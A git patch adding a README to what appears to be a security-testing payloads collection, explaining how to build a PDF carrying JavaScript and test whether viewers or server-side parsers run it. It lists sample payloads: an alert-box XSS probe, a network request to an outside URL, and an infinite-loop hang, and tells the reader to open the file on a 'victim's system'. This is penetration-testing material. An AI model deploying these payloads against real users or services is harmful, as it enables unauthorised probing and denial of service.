From 5817de1fb2e6a2a243b050673305fe6ed2a2e573 Mon Sep 17 00:00:00 2001
From: Mat <mtausig@users.noreply.github.com>
Date: Tue, 7 Mar 2023 17:10:23 +0100
Subject: [PATCH] Add documentation for PDF JS PoC

---
 .../Extension PDF JS/README.md                | 44 +++++++++++++++++++
 1 file changed, 44 insertions(+)
 create mode 100644 Upload Insecure Files/Extension PDF JS/README.md

diff --git a/Upload Insecure Files/Extension PDF JS/README.md b/Upload Insecure Files/Extension PDF JS/README.md
new file mode 100644
index 0000000..1ab4852
--- /dev/null
+++ b/Upload Insecure Files/Extension PDF JS/README.md	
@@ -0,0 +1,44 @@
+# Generate PDF File Containing JavaScript Code
+
+PDF may contain JavaScript code. 
+This script allow us to generate a PDF file which helps us to check if that code is executed when the file is opened.
+Possible targets are client applications trying to open the file or sererside backends which are parsing the PDF file.
+
+## HowTo
+
+1. Edit the file `poc.js` with the JS code you want to have included in your PDF file
+2. Install the required python modules using `pip install pdfrw`
+3. Create the PDF: `python poc.py poc.js`
+4. Open the file `result.pdf` on your victim's system
+
+## Possible exploit codes
+
+The full set of available functions is documented here: https://opensource.adobe.com/dc-acrobat-sdk-docs/library/jsapiref/JS_API_AcroJS.html
+
+### XSS (for GUI viewers)
+
+```js
+app.alert("XSS");
+```
+
+### Open URL
+
+```js
+var cURL="http://[REDACTED]/";
+var params =
+{
+     cVerb: "GET",
+     cURL: cURL
+};
+Net.HTTP.request(params);
+```
+
+### Timeout
+
+```js
+while (true) {}
+```
+
+## References
+
+The code is based on https://github.com/osnr/horrifying-pdf-experiments/